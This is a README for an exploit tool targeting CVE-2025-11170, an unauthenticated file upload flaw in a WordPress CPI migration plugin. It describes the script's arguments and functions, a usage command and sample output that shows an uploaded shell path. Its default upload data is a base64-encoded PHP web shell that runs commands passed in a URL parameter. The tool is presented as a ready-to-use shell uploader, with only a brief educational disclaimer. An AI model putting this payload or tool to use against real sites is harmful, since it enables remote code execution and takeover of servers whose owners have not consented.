# CVE-2025-11170
WP移行専用プラグイン for CPI &lt;= 1.0.2 - Unauthenticated Arbitrary File Upload


# 🚀 WP移行専用プラグイン for CPI <= 1.0.2 - Unauthenticated Arbitrary File Upload

## 📝 Description

The **WP移行専用プラグイン for CPI** plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `Cpiwm_Import_Controller::import` function in all versions up to, and including, 1.0.2.  
This allows unauthenticated attackers to **upload arbitrary files** to the affected site's server, potentially enabling remote code execution.

## 🛡️ Vulnerability Details

- **CVE:** CVE-2025-11170  
- **CVSS Score:** 9.8 (**Critical**)  
- **Attack Vector:** Unauthenticated remote file upload

## ⚡ Script Info

- **Script Name:** `CVE-2025-11170.py`
- **Purpose:** Automated shell/file uploader exploit for vulnerable WordPress CPI migration plugin.

## 🔧 Usage

### Arguments

| Argument               | Description                                                                                 |
|------------------------|---------------------------------------------------------------------------------------------|
| `-u`, `--url`          | **Base target URL** (e.g., `http://target.com/wordpress/`). The script appends `wp-admin/admin-ajax.php` automatically. |
| `-f`, `--filename`     | Shell or file name to upload. Default: `shell.php`                                         |
| `-d`, `--data`         | File content in base64 (or raw text). Default: `PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+`   |
| `-i`, `--index`        | Index field value. Default: `0`                                                            |
| `-H`, `--headers`      | Extra HTTP headers (format: `X-Key:Value;K2:Value2`)                                       |
| `-t`, `--timeout`      | Timeout for HTTP request (seconds). Default: `10`                                          |
| `--retries`            | Number of retry attempts. Default: `3`                                                     |
| `--backoff`            | Backoff factor between retries (seconds). Default: `0.7`                                   |
| `-v`, `--verbose`      | Increase verbosity for debugging (repeatable)                                              |

### 🚦 Methods Explained

- **Nxploited_parse_args**  
  Parses and validates input arguments. Ensures the right endpoint structure, headers, and data encoding.

- **Nxploited_logging**  
  Sets up advanced logging and verbosity for a detailed or minimal runtime output.

- **Nxploited_retry_session**  
  Initializes a persistent session with retry and backoff logic for resilient communications.

- **Nxploited_build_payload**  
  Constructs the POST request parameters for exploitation.

- **Nxploited_send**  
  Performs the actual POST request to the vulnerable endpoint and manages responses/errors.

- **Nxploited_output_result**  
  Processes and formats the response, displaying shell path on success, or debugging info otherwise.

---

### 💡 Example Usage

```bash
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
```

**Example Output:**
```
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited
```

---

## 🚨 Disclaimer

This script is provided **for educational purposes only**.  
Usage of this exploit on targets without proper authorization may be illegal.  
The author assumes **NO responsibility** for any misuse, damages, or legal consequences.

---

## 📢 Reach Me

GitHub: [Nxploited](https://github.com/Nxploited)  
Telegram: [KNxploited](https://t.me/KNxploited)

---

**_By: Nxploited ( Khaled Alenazi )_**
